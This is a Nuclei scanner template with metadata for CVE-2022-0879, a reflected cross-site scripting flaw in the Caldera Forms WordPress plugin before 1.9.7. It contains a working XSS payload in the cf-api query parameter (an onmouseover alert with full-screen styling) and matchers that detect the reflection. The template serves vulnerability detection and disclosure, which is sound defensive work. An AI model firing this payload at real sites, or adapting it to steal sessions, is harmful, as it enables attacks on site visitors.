Caldera Forms WordPress plugin < 1.9.7 contains a reflected cross-site scripting caused by lack of validation and escaping of the cf-api parameter in responses, letting attackers execute arbitrary scripts in victim's browser, exploit requires attacker to craft a malicious request.
PoC代码[已公开]
id: CVE-2022-0879
info:
name: Caldera Forms < 1.9.7 - Reflected Cross-Site Scripting
author: 0x_Akoko
severity: medium
description: |
Caldera Forms WordPress plugin < 1.9.7 contains a reflected cross-site scripting caused by lack of validation and escaping of the cf-api parameter in responses, letting attackers execute arbitrary scripts in victim's browser, exploit requires attacker to craft a malicious request.
impact: |
Attackers can execute arbitrary scripts in the victim's browser, potentially leading to session hijacking or defacement.
remediation: |
Update to version 1.9.7 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-0879
- https://wpscan.com/vulnerability/10e8e92a-4e1d-4e9c-8b3e-e8c5e0e0e0e0
- https://github.com/20142995/nuclei-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0879
cwe-id: CWE-79
epss-score: 0.02229
epss-percentile: 0.8404
cpe: cpe:2.3:a:calderaforms:caldera_forms:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
tags: wpscan,cve,cve2022,wordpress,xss,caldera-forms,reflected,unauth
http:
- method: GET
path:
- "{{BaseURL}}/?cf-api=%22%20style=position:fixed;left:0;top:0;right:0;bottom:0;%20onmouseover=alert(1)%20x"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "onmouseover=alert(1)", "caldera", " style=position:fixed")'
- '!regex(body, "value=[\"\\\\]*/?cf-api=")'
condition: and
# digest: 4a0a004730450221009e2d43d6a780c4cde5cf98cd6af1786f40323c545012c31cc0d89fffa8e9f00102202a83d197e0c5512ca8d9914ab3d412bf971b750a49ecd9ae73456cd399b356e3:922c64590222798bb761d5b6d8e72950